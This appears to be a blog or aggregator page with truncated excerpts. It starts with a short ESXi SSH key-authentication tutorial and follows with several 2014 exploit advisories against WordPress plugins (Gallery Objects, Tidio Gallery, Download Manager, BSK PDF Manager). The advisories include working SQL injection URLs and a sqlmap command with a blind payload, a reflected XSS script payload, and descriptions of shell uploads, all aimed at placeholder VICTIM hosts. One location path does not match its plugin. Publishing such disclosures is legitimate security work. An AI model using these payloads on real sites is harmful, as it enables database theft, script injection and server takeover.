To enable SSH public key authentication on the VMware ESXi 5.x hypervisor, just create a new file inside the hypervisor.
Let's take the following public key of the root user as an example:
_ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfJAIbuQj+T0xD1uA3B1yOqsPCfORhRNLzkrA5OqW1HC2ZTdvgTj/UgP1KJ6UBC3Ux0DRIoEHwoPonG4XdwrSvQVaMYLG4G+kAHwZN5A3IL7D4aNGJPtMPmxfeVdsJHGCO2xIcpPmk/FpcJJW2IF3BlYqJr8sqbo6/odp0kNK83ROuek0Lbaqhs/NE1rxfKbYouko9Rg/DBnKIIIITxWYZuYYqa+uXPzprpb8n6YX5+EkiuTo9to0dyA/M5kYcRrbrv1aYjU2HsmQJiDz+x4KHvHIrAjcf0t9Fu5yLuV0KuiTnzdYL+FojkVNyW/hXNaT4fWI2iKYEaCc7vedqAPiZ root@backbox3_
SSH Public key on ESXi 5.x -> Connection test without key
Let's try to establish an SSH connection from a Linux distribution to the ESXi 5.x hypervisor (10.0.0.3):
root@backbox3:~# ssh 10.0.0.3
The authenticity of host '10.0.0.3 (10.0.0.3)' can't be established....
######################
# Exploit Title : WordPress Gallery Objects 0.4 SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://galleryobjects.com/
# Software Link : http://downloads.wordpress.org/plugin/gallery-objects.0.4.zip
# Dork Google: inurl:/admin-ajax.php?action=go_view_object
# Date : 2014-07-18
# Tested on : Windows 7 / Mozilla Firefox
Windows 7 / sqlmap (0.8-1)
Linux / Mozilla Firefox
Linux / sqlmap 1.0-dev-5b2ded0
######################
PoC via Browser:
http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and 1=2]&type=html
sqlmap:
sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1&type=html" -p viewid
---
Place: GET
Parameter: viewid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=go_view_object&viewid=475 AND 7403=7403&type=html
---
#####################
Discovered By : Claudio Viviani
http://www....
######################
# Exploit Title : WordPress Tidio Gallery 1.1 Shell Upload and XSS Vulnerabilities
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://www.tidioelements.com/
# Software Link : http://downloads.wordpress.org/plugin/tidio-gallery.zip
# Date : 2014-07-14
# Tested on : Windows 7 / Mozilla Firefox
######################
# Location : http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php -> XSS
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-post.php -> Upload Shell
######################
# Vulnerability n°1:
XSS Reflected Unauthenticated
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="/><script>alert(1);</script>
# Vulnerability n°2:
An unprivileged user such as a subscriber could upload a shell script....
######################
# Exploit Title : WordPress Download Manager 2.6.8 Shell Upload Vulnerability
# Exploit Author : Claudio Viviani
# Vendor Homepage : www.wpdownloadmanager.com
# Software Link : http://downloads.wordpress.org/plugin/download-manager.zip
# Date : 2014-07-11
# Tested on : Linux / Mozilla Firefox / WordPress Download Manager 2.6.8 Free Version
# # # WORKS ONLY ON SERVERS WITH .HTACCESS FILES DISABLED
######################
# Location : http://IP_VICTIM/wp-content/plugins/download-manager/wpdm-add-new-file.php
######################
# Description :
WordPress Download Manager 2....
######################
# Exploit Title : WordPress BSK PDF Manager 1.3.2 Authenticated SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://www.bannersky.com/bsk-pdf-manager/
# Software Link : http://downloads.wordpress.org/plugin/bsk-pdf-manager.zip
# Date : 2014-07-04
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0-dev-5b2ded0
######################
# Location : http://localhost/wp-content/plugins/compfight/compfight-search.php
######################
# Vulnerable code :
[claudio@localhost ~]$ grep -R GET bsk-pdf-manager/
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['view']) && $_GET['view']){
bsk-pdf-manager/inc/bsk-pdf-dashboard....